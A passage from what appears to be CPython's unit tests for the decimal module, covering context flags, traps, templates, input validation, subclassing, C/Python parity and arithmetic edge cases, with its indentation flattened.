s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=0)
self.assertRaises(TypeError, Context, traps=1)
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(C.__libmpdec_version__, P.__libmpdec_version__)
x = [s for s in dir(C) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
y.append('__slots__')
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_quantize_watchexp(self):
# watchexp functionality
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
x = Decimal(99999).quantize(Decimal("1e3"), watchexp=False)
self.assertEqual(x, Decimal('1.00E+5'))
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises((OverflowError, ValueError), Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises((OverflowError, ValueError), setattr, c, attr,
int_max+1)
self.assertRaises((OverflowError, ValueError), setattr, c, attr,
-int_max-2)
if sys.platform != 'win32':
self.assertRaises((OverflowError, ValueError), setattr, c, attr, int_max)
self.assertRaises((OverflowError, ValueError), setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises((ValueError, OverflowError), setattr, c, attr, 2**32)
self.assertRaises((ValueError, OverflowError), setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
# pypy does not keep interned strings
@cpython_only
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
